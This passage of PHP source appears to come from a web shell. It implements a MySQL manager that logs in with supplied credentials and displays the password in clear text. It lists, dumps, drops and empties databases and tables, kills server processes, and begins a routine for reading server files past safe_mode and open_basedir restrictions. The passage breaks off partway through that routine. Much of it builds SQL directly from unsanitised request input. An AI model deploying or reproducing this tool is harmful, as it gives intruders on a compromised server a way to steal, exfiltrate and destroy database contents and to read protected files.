1114. $sqlquicklaunch[] = array("Logout",$surl."x=sql");
1115. echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br>";
1116. if (count($sqlquicklaunch) > 0) {
1117. foreach($sqlquicklaunch as $item) {
1118. echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1119. }
1120. }
1121. }
1122. echo "</div>";
1123. echo "<center><table class='tab'><tr>";
1124. if (!$sql_sock) {
1125. echo '<td>
1126. <form name="f_sql" action="'.$surl.'x=sql" method="POST">
1127. <input type="hidden" name="x" value="sql">
1128. <table class="tabnet" style="padding:1px;">
1129. <tr><th colspan="2"><b>MySQL Manager</b></th></tr>
1130. <tr><td>Host</td><td><input type="text" name="sql_server" class="inputz" style="width:249px;background:black" value="localhost"></td></tr>
1131. <tr><td>Username</td><td><input type="text" name="sql_login" class="inputz" value="" style="width:249px;background:black"></td></tr>
1132. <tr><td>Password</td><td><input type="password" name="sql_passwd" class="inputz" value="" style="width:249px;background:black;"></td></tr>
1133. <tr><td>Database</td><td><input type="text" name="sql_db" value="" class="inputz" style="width:249px;background:black"></td></tr>
1134. <tr><td>Port</td><td><input type="text" name="sql_port" class="inputz" value="3306" style="background:black;" size="6"> <input type="submit" class="inputzbut" style=color:$color value="Connect"></td></tr>
1135. </table>
1136. </form>';
1137. }
1138. else {
1139. echo '<td valign="top" style="border:1px solid #333333;">
1140. <center>
1141. <a href="'.$sql_surl.'"><b style="color:#00ff00;">HOME</b></a>
1142. <hr size="1" noshade>';
1143. $result = mysql_list_dbs($sql_sock);
1144. if (!$result) { echo mysql_smarterror(); }
1145. else {
1146. echo '<form action="'.$surl.'x=sql">
1147. <input type="hidden" name="x" value="sql">
1148. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1149. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1150. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1151. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1152. <select name="sql_db" onchange="this.form.submit()" style="width:100%;">';
1153. $c = 0;
1154. $dbs = "";
1155. while ($row = mysql_fetch_row($result)) {
1156. $dbs .= "\t\t<option value=\"".$row[0]."\"";
1157. if (@$sql_db == $row[0]) { $dbs .= " selected"; }
1158. $dbs .= ">".$row[0]."</option>\n";
1159. $c++;
1160. }
1161. echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
1162. echo $dbs;
1163. }
1164. echo '</select>
1165. <hr size="1" noshade>
1166. </form>
1167. </center>';
1168. if (isset($sql_db)) {
1169. $result = mysql_list_tables($sql_db);
1170. if (!$result) {
1171. $result = mysql_list_dbs($sql_sock);
1172. $num = mysql_num_rows($result);
1173. for( $i = 0; $i < $num; $i++ ) {
1174. $dbname = mysql_dbname( $result, $i );
1175. echo "<table class='tab'><td style='background:#3F3F3F;border:1px solid #202020;border-top: 1px solid #505050;border-left: 1px solid #505050;'><b>+ <a href=\"".$sql_surl."sql_db=".$dbname."\">$dbname</a></b></td></table>"; } }
1176. else {
1177. echo "\t<table class='tub'><th><a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a></th></table><br>\n";
1178. $c = 0;
1179. while ($row = mysql_fetch_array($result)) {
1180. $count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]);
1181. $count_row = mysql_fetch_array($count);
1182. echo "\t<b>+ <a style='color:#00ff00;' href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
1183. mysql_free_result($count);
1184. $c++;
1185. }
1186. if (!$c) { echo "No tables found in database"; }
1187. }
1188. }
1189. echo '</td>';
1190. echo '<td style="border:1px solid #333333;">';
1191. $diplay = TRUE;
1192. if (@$sql_db) {
1193. if (!is_numeric($c)) { $c = 0; }
1194. if ($c == 0) { $c = "no"; }
1195. echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
1196. if (count(@$dbquicklaunch) > 0) {
1197. foreach($dbsqlquicklaunch as $item) {
1198. echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
1199. }
1200. }
1201. echo "</b></center>\n";
1202. $xs = array("","dump");
1203. if ($sql_x == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1204. elseif ($sql_x == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_x = "query";}
1205. elseif ($sql_x == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_x = "dump";}
1206. elseif ($sql_x == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1207. elseif ($sql_x == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1208. elseif ($sql_x == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1209. elseif ($sql_x == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_x = "query";}
1210. elseif ($sql_x == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_x = "query";}
1211. elseif ($sql_tbl_x == "insert") {
1212. if ($sql_tbl_insert_radio == 1) {
1213. $keys = "";
1214. $akeys = array_keys($sql_tbl_insert);
1215. foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
1216. if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
1217. $values = "";
1218. $i = 0;
1219. foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
1220. if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
1221. $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
1222. $sql_x = "query";
1223. $sql_tbl_x = "browse";
1224. }
1225. elseif ($sql_tbl_insert_radio == 2) {
1226. $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
1227. $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
1228. $result = mysql_query($sql_query) or print(mysql_smarterror());
1229. $result = mysql_fetch_array($result, MYSQL_ASSOC);
1230. $sql_x = "query";
1231. $sql_tbl_x = "browse";
1232. }
1233. }
1234. if ($sql_x == "query") {
1235. echo "<hr size=\"1\" noshade>";
1236. if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
1237. if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
1238. if ((!$submit) or ($sql_x)) { echo "<table class='tab'><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>"; }
1239. }
1240. if (in_array($sql_x,$xs)) {
1241. echo '<table class="tab">
1242. <tr>
1243. <td style="border:1px solid #333333;padding:3px;">
1244. <b>Create new table:</b>
1245. <form action="'.$surl.'">
1246. <input type="hidden" name="x" value="sql">
1247. <input type="hidden" name="sql_x" value="newtbl">
1248. <input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1249. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1250. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1251. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1252. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1253. <input type="text" name="sql_newtbl" size="20">
1254. Fields: <input type="text" name="sql_field" size="3">
1255. <input class="inputzbut" type="submit" value="Create">
1256. </form>
1257. </td>
1258. <td style="border:1px solid #333333;padding:3px;"><b>Dump DB:</b>
1259. <form action="'.$surl.'">
1260. <input type="hidden" name="x" value="sql">
1261. <input type="hidden" name="sql_x" value="dump">
1262. <input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
1263. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1264. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1265. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1266. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1267. <input type="text" name="dump_file" size="30" value="dump_'.getenv("SERVER_NAME").'_'.$sql_db.'_'.date("d-m-Y-H-i-s").'.sql">
1268. <input type="submit" class="inputzbut" name="submit" value="Dump">
1269. </form>
1270. </td>
1271. </tr>
1272. </table>';
1273. if (!empty($sql_x)) { echo "<hr size=\"1\" noshade>"; }
1274. if ($sql_x == "newtbl") {
1275. echo "<b>";
1276. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
1277. echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
1278. }
1279. else { echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror(); }
1280. }
1281. elseif ($sql_x == "dump") {
1282. if (empty($submit)) {
1283. $diplay = FALSE;
1284. echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
1285. echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
1286. $v = join (";",$dmptbls);
1287. echo "<b>Only tables (explode \";\") :</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
1288. if ($dump_file) {$tmp = $dump_file;}
1289. else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
1290. echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
1291. echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
1292. echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
1293. echo "<br><br><input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"Dump\">";
1294. echo "</form>";
1295. }
1296. else {
1297. $diplay = TRUE; $set = array(); $set["sock"] = $sql_sock; $set["db"] = $sql_db; $dump_out = "download"; $set["print"] = 0;
1298. $set["nl2br"] = 0; $set[""] = 0; $set["file"] = $dump_file; $set["add_drop"] = TRUE; $set["onlytabs"] = array();
1299. if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
1300. $ret = mysql_dump($set);
1301. if ($sql_dump_download) {
1302. @ob_clean();
1303. header("Content-type: application/octet-stream");
1304. header("Content-length: ".strlen($ret));
1305. header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
1306. echo $ret;
1307. exit;
1308. }
1309. elseif ($sql_dump_savetofile) {
1310. $fp = fopen($sql_dump_file,"w");
1311. if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
1312. else {
1313. fwrite($fp,$ret);
1314. fclose($fp);
1315. echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
1316. }
1317. }
1318. else {echo "<b>Dump: nothing to do!</b>";}
1319. }
1320. }
1321. if ($diplay) {
1322. if (!empty($sql_tbl)) {
1323. if (empty($sql_tbl_x)) {$sql_tbl_x = "browse";}
1324. $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
1325. $count_row = mysql_fetch_array($count);
1326. mysql_free_result($count);
1327. $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
1328. $tbl_struct_fields = array();
1329. while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
1330. if (@$sql_ls > @$sql_le) { $sql_le = $sql_ls + $perpage; }
1331. if (empty($sql_tbl_page)) { $sql_tbl_page = 0; }
1332. if (empty($sql_tbl_ls)) { $sql_tbl_ls = 0; }
1333. if (empty($sql_tbl_le)) { $sql_tbl_le = 30; }
1334. $perpage = $sql_tbl_le - $sql_tbl_ls;
1335. if (!is_numeric($perpage)) { $perpage = 10; }
1336. $numpages = $count_row[0]/$perpage;
1337. $e = explode(" ",$sql_order);
1338. if (count($e) == 2) {
1339. if ($e[0] == "d") { $asc_desc = "DESC"; }
1340. else { $asc_desc = "ASC"; }
1341. $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1342. }
1343. else {$v = "";}
1344. $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1345. $result = mysql_query($query) or print(mysql_smarterror());
1346. echo "<center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1347. echo "<hr size=\"1\" noshade>";
1348. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=structure\">[<b> Structure </b>]</a> &nbsp; ";
1349. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=browse\">[<b> Browse </b>]</a> &nbsp; ";
1350. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_x=tbldump&thistbl=1\">[<b> Dump </b>]</a> &nbsp; ";
1351. echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_x=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a> &nbsp; ";
1352. if ($sql_tbl_x == "structure") { echo "<b>Under construction!</b>"; }
1353. if ($sql_tbl_x == "insert") {
1354. if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1355. if (!empty($sql_tbl_insert_radio)) { echo "<b>Under construction!</b>"; }
1356. else {
1357. echo "<br><br><b>Inserting row into table:</b><br>";
1358. if (!empty($sql_tbl_insert_q)) {
1359. $sql_query = "SELECT * FROM `".$sql_tbl."`";
1360. $sql_query .= " WHERE".$sql_tbl_insert_q;
1361. $sql_query .= " LIMIT 1;";
1362. $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1363. $values = mysql_fetch_assoc($result);
1364. mysql_free_result($result);
1365. }
1366. else {$values = array();}
1367. echo "<form method=\"POST\"><table width=\"1%\" class='tub'><tr><th><b>Field</b></th><th><b>Type</b></th><th><b>Function</b></th><th><b>Value</b></th></tr>";
1368. foreach ($tbl_struct_fields as $field) {
1369. $name = $field["Field"];
1370. if (empty($sql_tbl_insert_q)) {$v = "";}
1371. echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1372. $i++;
1373. }
1374. echo "</table><br>";
1375. echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1376. if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1377. echo "<br><br><input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form>";
1378. }
1379. }
1380. if ($sql_tbl_x == "browse") {
1381. $sql_tbl_ls = abs($sql_tbl_ls);
1382. $sql_tbl_le = abs($sql_tbl_le);
1383. echo "<hr size=\"1\" noshade>";
1384. echo "<b>Page: </b>";
1385. $b = 0;
1386. for($i=0;$i<$numpages;$i++) {
1387. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1388. echo $i;
1389. if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1390. if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1391. else { echo " "; }
1392. }
1393. if ($i == 0) {echo "empty";}
1394. echo "<br><br><form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>";
1395. echo "<br><form method=\"POST\">\n";
1396. echo "<table class='tub'><tr>";
1397. echo "<th><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></th>";
1398. for ($i=0;$i<mysql_num_fields($result);$i++) {
1399. $v = mysql_field_name($result,$i);
1400. if ($e[0] == "a") {$s = "d"; $m = "asc";}
1401. else {$s = "a"; $m = "desc";}
1402. echo "<th>";
1403. if (empty($e[0])) {$e[0] = "a";}
1404. if (@$e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1405. else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."x=img&img=sort_".$m."\" alt=\"".$m."\"></a>";}
1406. echo "</th>";
1407. }
1408. echo "<th><font color=\"#00FF00\"><b>action</b></font></th>";
1409. echo "</tr>";
1410. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1411. echo "<tr>";
1412. $w = "";
1413. $i = 0;
1414. foreach ($row as $k=>$v) {
1415. $name = mysql_field_name($result,$i);
1416. $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;
1417. }
1418. if (count($row) > 0) { $w = substr($w,0,strlen($w)-3); }
1419. echo "<td align='center' style='padding:0px;'><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1420. $i = 0;
1421. foreach ($row as $k=>$v) {
1422. $v = htmlspecialchars($v);
1423. if ($v == "") { $v = "<font color=\"#00FF00\">NULL</font>"; }
1424. echo "<td>".$v."</td>";
1425. $i++;
1426. }
1427. echo "<td>";
1428. echo "<a href=\"".$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">Delete</a>";
1429. echo "&nbsp;|&nbsp;";
1430. echo "<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\">Edit</a> ";
1431. echo "</td>";
1432. echo "</tr>";
1433. }
1434. mysql_free_result($result);
1435. echo "</table><hr size=\"1\" noshade><p align=\"left\"><input type=\"checkbox\"/> <select name=\"sql_x\">";
1436. echo "<option value=\"\">With selected:</option>";
1437. echo "<option value=\"deleterow\">Delete</option>";
1438. echo "</select> <input class=\"inputzbut\" type=\"submit\" value=\"Confirm\"></form></p>";
1439. }
1440. }
1441. else {
1442. $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1443. if (!$result) { echo mysql_smarterror(); }
1444. else {
1445. echo '<form method="POST">
1446. <table class="tub">
1447. <tr><th><input type="checkbox" name="boxtbl_all" value="1"></th><th>Table</th><th>Rows</th><th>Engine</th><th>Created</th><th>Modified</th><th>Size</th><th>Action</th></tr>';
1448. $i = 0;
1449. $tsize = $trows = 0;
1450. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
1451. $tsize += $row["Data_length"];
1452. $trows += $row["Rows"];
1453. $size = view_size($row["Data_length"]);
1454. echo'<tr>
1455. <td align="center" style="padding:0px;"><input type="checkbox" name="boxtbl[]" value="'.$row["Name"].'"></td>
1456. <td><a href="'.$sql_surl.'sql_tbl='.urlencode($row["Name"]).'"><b>'.$row["Name"].'</b></a></td>
1457. <td>'.$row["Rows"].'</td><td>'.$row["Engine"].'</td><td>'.$row["Create_time"].'</td><td>'.$row["Update_time"].'</td><td>'.$size.'</td>
1458. <td><a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DELETE FROM `".$row["Name"]."`").'">Empty</a>&nbsp;|&nbsp;<a href="'.$sql_surl.'sql_x=query&sql_query='.urlencode("DROP TABLE `".$row["Name"]."`").'">Drop</a>&nbsp;|&nbsp;<a href="'.$sql_surl.'sql_tbl_x=insert&sql_tbl='.$row["Name"].'">Insert</a></td>
1459. </tr>';
1460. $i++;
1461. }
1462. echo "\t\t<tr>\n".
1463. "\t\t<th>+</th><th>$i table(s)</th><th>$trows</th><th>$row[1]</th><th>$row[10]</th><th>$row[11]</th><th>".view_size($tsize)."</th><th></th>\n";
1464. echo'</tr>
1465. </table>
1466. <div align="right">
1467. <select class="inputz" name="sql_x">
1468. <option value="">With selected:</option>
1469. <option value="tbldrop">Drop</option>
1470. <option value="tblempty">Empty</option>";
1471. <option value="tbldump">Dump</option>";
1472. <option value="tblcheck">Check table</option>";
1473. <option value="tbloptimize">Optimize table</option>";
1474. <option value="tblrepair">Repair table</option>";
1475. <option value="tblanalyze">Analyze table</option>";
1476. </select>
1477. <input class="inputzbut" type="submit" value="Confirm">
1478. </div>
1479. </form>';
1480. mysql_free_result($result);
1481. }
1482. }
1483. }
1484. }
1485. }
1486. else {
1487. $xs = array("","newdb","serverstatus","servervars","processes","getfile");
1488. if (in_array($sql_x,$xs)) {
1489. echo '<table class="tab">
1490. <tr>
1491. <td style="border:1px solid #333333;padding:3px;"><b>Create new DB:</b>
1492. <form action="'.$surl.'">
1493. <input type="hidden" name="x" value="sql">
1494. <input type="hidden" name="sql_x" value="newdb">
1495. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1496. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1497. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1498. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1499. <input class="inputz" type="text" name="sql_newdb" size="20">
1500. <input class="inputzbut" type="submit" value="Create">
1501. </form>
1502. </td>
1503. <td style="border:1px solid #333333;padding:3px;"><b>View File:</b>
1504. <form action="'.$surl.'">
1505. <input type="hidden" name="x" value="sql">
1506. <input type="hidden" name="sql_x" value="getfile">
1507. <input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
1508. <input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
1509. <input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
1510. <input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
1511. <input class="inputz" type="text" name="sql_getfile" size="30" value="'.htmlspecialchars($sql_getfile).'">
1512. <input class="inputzbut" type="submit" value="Get">
1513. </form>
1514. </td>
1515. </tr>
1516. </table>';
1517. }
1518. if (!empty($sql_x)) {
1519. echo "<hr size=\"1\" noshade>";
1520. if ($sql_x == "newdb") {
1521. echo "<b>";
1522. if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1523. else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1524. }
1525. if ($sql_x == "serverstatus") {
1526. $result = mysql_query("SHOW STATUS", $sql_sock);
1527. echo "<center><b>Server status variables:</b><br><br>";
1528. echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1529. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1530. echo "</table></center>";
1531. mysql_free_result($result);
1532. }
1533. if ($sql_x == "servervars") {
1534. $result = mysql_query("SHOW VARIABLES", $sql_sock);
1535. echo "<center><b>Server variables:</b><br><br>";
1536. echo "<table class='tub'><th><b>Name</b></th><th><b>Value</b></th></tr>";
1537. while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1538. echo "</table>";
1539. mysql_free_result($result);
1540. }
1541. if ($sql_x == "processes") {
1542. if (!empty($kill)) {
1543. $query = "KILL ".$kill.";";
1544. $result = mysql_query($query, $sql_sock);
1545. echo "<b>Process #".$kill." was killed.</b>";
1546. }
1547. $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1548. echo "<center><b>Processes:</b><br><br>";
1549. echo "<table class='tub'><th><b>ID</b></th><th><b>USER</b></th><th><b>HOST</b></th><th><b>DB</b></th><th><b>COMMAND</b></th><th><b>TIME</b></th><th><b>STATE</b></th><th><b>INFO</b></th><th><b>Action</b></th></tr>";
1550. while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1551. echo "</table>";
1552. mysql_free_result($result);
1553. }
1554. if ($sql_x == "getfile") {
1555. $tmpdb = $sql_login."_tmpdb";
1556. $select = mysql_select_db($tmpdb);
1557. if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1558. if ($select) {
1559. $created = FALSE;
1560. mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
